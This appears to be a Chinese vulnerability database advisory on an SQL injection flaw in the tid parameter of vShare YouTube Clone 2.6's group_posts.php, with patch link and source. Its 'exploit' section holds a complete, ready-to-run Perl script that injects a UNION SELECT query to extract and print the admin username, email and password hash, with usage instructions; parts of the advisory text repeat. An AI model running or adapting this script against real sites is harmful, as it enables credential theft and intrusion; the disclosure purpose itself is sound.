vShare YouTube Clone脚本group_posts.php文件SQL注入漏洞
添加时间:
2008-10-04
系统编号:
WAVDB-01170
BUGTRAQ: 29114
影响版本:
vShare YouTube Clone 2.6
程序介绍:
解决方案:
厂商补丁:
BuyScripts
----------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://forums.buyscripts.in/viewtopic.php?f=7&t=3389
信息来源:
<*来源:Saime
链接:http://secunia.com/advisories/30144/
*>
2008-10-04
系统编号:
WAVDB-01170
BUGTRAQ: 29114
影响版本:
vShare YouTube Clone 2.6
程序介绍:
vShare YouTube clone是用于在网站上共享视频的PHP脚本。
漏洞分析:
vShare YouTube clone的group_posts.php文件中没有正确地过滤对tid参数的输入便在SQL查询中使用,这允许远程攻击者通过提交恶意查询请求执行SQL注入攻击。
漏洞利用:
#!/usr/bin/perl
# Coded by: Saime
# vShare Youtube Clone v2.6 (group_posts.php tid) Remote SQL Injection
# Author: Saime
# URL: http://www.buyscripts.in
# Price: $10.00
# Date: 8/05/2008
# Greetz: BaKo,DrWh4x,optiplex,xprog,cam-man-dan,Tulle,t0pP8uZz,Inspiratio,Novalok,illuz1oN,Untamed and everyone else I forgot!
# Site: http://h4ck-y0u.org
use LWP;
$site = @ARGV[0];
$ua = LWP::UserAgent->new;
my $injection = 'group_posts.php?tid=1+union+select+1,2,3,4,concat(username,0x3a,email,0x3a,pwd),6,7+from+signup+limit+0,1--';
if (@ARGV < 1) {&usage;}
else { &exploit( ) }
sub exploit ( ) {
print "[+] Exploiting...\n";
$passres = $ua->get("http://$site/$injection");
$exploitcon = $passres->content;
if ($exploitcon =~ m/<b>Topic:<\/b>(.*)<b>(.*):(.*):([a-f0-9]{32})<\/b><br \/>/gmi){
$pass = $4;
$admin = $2;
$email = $3;
print "[+] Admin Password: $pass\n";
print "[+] Admin Username: $admin\n";
print "[+] Admin Email: $email\n";
}
else {
print "[-] Unable To Get The Password...\n";
exit(0);
}
}
sub usage ( )
{
print "Usage: ./vshare.pl [host]\n";
print "Example: ./vshare.pl www.site.com\n";
exit(0);
}
解决方案:
厂商补丁:
BuyScripts
----------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://forums.buyscripts.in/viewtopic.php?f=7&t=3389
信息来源:
<*来源:Saime
链接:http://secunia.com/advisories/30144/
*>